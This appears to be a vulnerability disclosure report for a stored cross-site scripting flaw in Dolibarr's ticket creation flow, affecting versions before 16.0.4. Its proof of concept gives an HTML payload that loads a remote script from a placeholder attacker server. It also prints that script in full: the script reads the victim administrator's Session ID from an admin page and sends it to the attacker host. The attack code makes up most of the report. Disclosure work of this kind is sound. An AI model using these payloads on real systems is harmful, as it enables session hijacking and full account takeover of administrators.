Stored XSS in dolibarr/dolibarr
Reported on
Feb 6th 2023
Description
A Cross-Site Scripting (XSS) vulnerability exists in Dolibarr before 16.0.4 via the ticket creation flow. Exploitation requires that an admin change the value of the box using "onbeforeinput" event. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected scripts can extract the Session ID, which can lead to full Account takeover.
Proof of Concept
- I used the payload
<font onbeforeinput="alert('XXX')" contenteditable>test</font>
on fields that accept html textarea input (restricthtml and restricthtmlallowunvalid)
- In worst case, if you want to get Session ID, the following payload will be
<font onbeforeinput="let pwned = document.createElement('script'); pwned.setAttribute('src', '{ATTACKER-WEBSERVER}/hax.js'); document.body.appendChild(pwned);" contenteditable>test</font>
And the content of hax.js hosted by attacker will be:
var te = /[0-9a-zA-Z]+/gm;
var re;
x=new XMLHttpRequest;
x.onload=function(){
re = this.responseText;
var reg = /Session\sID\S+\s\S+/gm;
console.log(((re.match(reg))[0].match(te))[6]);
var sessionId=((re.match(reg))[0].match(te))[6];
var url = "{ATTACKER-WEBSERVER}/?sess=" + sessionId;
$.ajax(url);
};
x.open('GET','{VICTIM-WEBSERVER}/admin/system/dolibarr.php', true);
x.withCredentials = true;
x.send(null);
Demo
Impact
In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected scripts can extract the Session ID, which can lead to full Account takeover.
References
